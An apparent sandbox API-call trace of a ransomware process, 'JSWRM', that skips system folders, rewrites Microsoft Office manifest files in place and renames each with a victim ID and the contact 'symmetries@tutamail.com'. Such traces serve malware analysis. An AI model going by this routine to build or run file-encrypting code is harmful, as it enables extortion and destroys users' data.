lstrcmpiW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="...") returned 1 [0101.651] lstrcmpiW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="windows") returned -1 [0101.651] lstrcmpiW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="recovery") returned -1 [0101.651] lstrcmpiW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0101.651] lstrcmpiW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0101.651] lstrcmpiW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.651] lstrcmpiW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0101.651] lstrcmpiW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="msocache") returned -1 [0101.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0101.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.lyncmui.msi.16.en-us.xml", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0101.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.lyncmui.msi.16.en-us.xml", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.lyncmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 36 [0101.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0101.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0101.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.lyncmui.msi.16.en-us.xml", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0101.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.lyncmui.msi.16.en-us.xml", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.lyncmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 36 [0101.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0101.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0101.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0101.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0101.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.lyncmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.lyncmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.652] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23444) returned 1 [0101.652] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5b90) returned 0x24d210 [0101.652] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5b90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x5b90, lpOverlapped=0x0) returned 1 [0101.655] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.655] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5b90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x5b90, lpOverlapped=0x0) returned 1 [0101.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.655] CloseHandle (hObject=0x45c) returned 1 [0101.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0101.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0101.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0101.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0101.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0101.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0101.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0101.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0101.656] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.lyncmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.lyncmui.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.lyncmui.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.lyncmui.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0101.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0101.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0101.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.657] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd32bedda, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd32bedda, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd3593a88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6b4a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.office32mui.msi.16.en-us.xml", cAlternateFileName="C2BADD~1.XML")) returned 1 [0101.657] lstrcmpiW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2=".") returned 1 [0101.657] lstrcmpiW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2="..") returned 1 [0101.657] lstrcmpiW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2="...") returned 1 [0101.657] lstrcmpiW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2="windows") returned -1 [0101.657] lstrcmpiW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2="recovery") returned -1 [0101.657] lstrcmpiW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0101.657] lstrcmpiW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0101.657] lstrcmpiW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.657] lstrcmpiW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0101.657] lstrcmpiW (lpString1="C2RManifest.office32mui.msi.16.en-us.xml", lpString2="msocache") returned -1 [0101.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0101.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.office32mui.msi.16.en-us.xml", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0101.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.office32mui.msi.16.en-us.xml", cchWideChar=40, lpMultiByteStr=0x22ce70, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.office32mui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 40 [0101.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0101.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0101.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.office32mui.msi.16.en-us.xml", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0101.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.office32mui.msi.16.en-us.xml", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.office32mui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 40 [0101.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0101.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0101.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0101.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0101.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.office32mui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.office32mui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.658] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=27466) returned 1 [0101.658] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6b40) returned 0x24d210 [0101.659] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6b40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x6b40, lpOverlapped=0x0) returned 1 [0101.662] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.662] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6b40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x6b40, lpOverlapped=0x0) returned 1 [0101.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.663] CloseHandle (hObject=0x45c) returned 1 [0101.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0101.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0101.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0101.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0101.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0101.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0101.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.663] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.office32mui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.office32mui.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.office32mui.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.office32mui.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0101.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0101.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0101.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.664] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2b97d2d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2b97d2d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2cc8f5f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4f3f4, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.office32ww.msi.16.x-none.xml", cAlternateFileName="C2EBFE~1.XML")) returned 1 [0101.664] lstrcmpiW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2=".") returned 1 [0101.664] lstrcmpiW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2="..") returned 1 [0101.664] lstrcmpiW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2="...") returned 1 [0101.664] lstrcmpiW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2="windows") returned -1 [0101.664] lstrcmpiW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2="recovery") returned -1 [0101.664] lstrcmpiW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0101.664] lstrcmpiW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0101.664] lstrcmpiW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.664] lstrcmpiW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0101.664] lstrcmpiW (lpString1="C2RManifest.office32ww.msi.16.x-none.xml", lpString2="msocache") returned -1 [0101.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0101.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.office32ww.msi.16.x-none.xml", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0101.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.office32ww.msi.16.x-none.xml", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.office32ww.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 40 [0101.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0101.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0101.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.office32ww.msi.16.x-none.xml", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0101.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0101.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.office32ww.msi.16.x-none.xml", cchWideChar=40, lpMultiByteStr=0x22d298, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.office32ww.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 40 [0101.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0101.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0101.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0101.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0101.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.office32ww.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.office32ww.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.665] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=324596) returned 1 [0101.665] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0101.666] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0101.687] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.687] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0101.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.688] CloseHandle (hObject=0x45c) returned 1 [0101.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0101.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0101.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0101.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0101.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0101.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0101.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.688] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.office32ww.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.office32ww.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.office32ww.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.office32ww.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0101.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0101.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0101.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0101.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 